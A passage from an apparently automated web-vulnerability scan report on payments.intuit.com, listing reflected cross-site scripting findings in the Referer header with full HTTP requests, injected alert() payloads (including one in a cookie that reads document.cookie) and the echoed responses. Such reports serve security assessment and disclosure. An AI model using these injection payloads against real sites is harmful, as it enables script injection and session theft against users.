Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ACIQv+A9wNRqvY9FGWFs9A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C020A0805192AA117E3B4FD864C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=f7c47--><script>alert(1)</script>3f78b487239 | -->
...[SNIP]...

1.40. http://payments.intuit.com/products/quickbooks-credit-card-processing-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fb1c'-alert(1)-'0a97bbe41af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-credit-card-processing-services.jsp?scid=ips_pc90_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:53 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Hl+omgw3mgYJwPVw-7Ka0A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:54 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96143690A0805192AA117E300DFFB9A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140382


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af';
                   </script>
...[SNIP]...

1.41. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d309'-alert(1)-'98a1572654c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=btxMA5VqwqQDHEHmDqtOzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960424A0A0805192AA117E3CAA3A4B6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100547


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c';
                   </script>
...[SNIP]...

1.42. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 43536--><script>alert(1)</script>5f48ddc4902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wzoA97wyb5Q5h6Q0ZX7n2g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96081C10A0805192AA117E3B2B38A89
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100579


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=43536--><script>alert(1)</script>5f48ddc4902 | -->
...[SNIP]...

1.43. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload eb605--><script>alert(1)</script>313dcde783a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=IOOtD5FBbrudVSKv9odFBw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDDB70A0805192AA117E38E79C1AD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100578


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a | -->
...[SNIP]...

1.44. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 193fe'-alert(1)-'288dfdb8b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=crm5I6lOhZJyaODDHoAwfQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F93050A0805192AA117E36EB42821
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100546


                                                                                                                                                                                                                                                                                                                                                                                                                       
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d';
                   </script>
...[SNIP]...

1.45. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71edb'-alert(1)-'6b7e8734b5b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=madTfYdoG5tkbAh6pJksTg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C5C0A0805192AA117E3A5FE5D3D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145458


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b';
                   </script>
...[SNIP]...

1.46. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9b18e--><script>alert(1)</script>e7e01249c3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

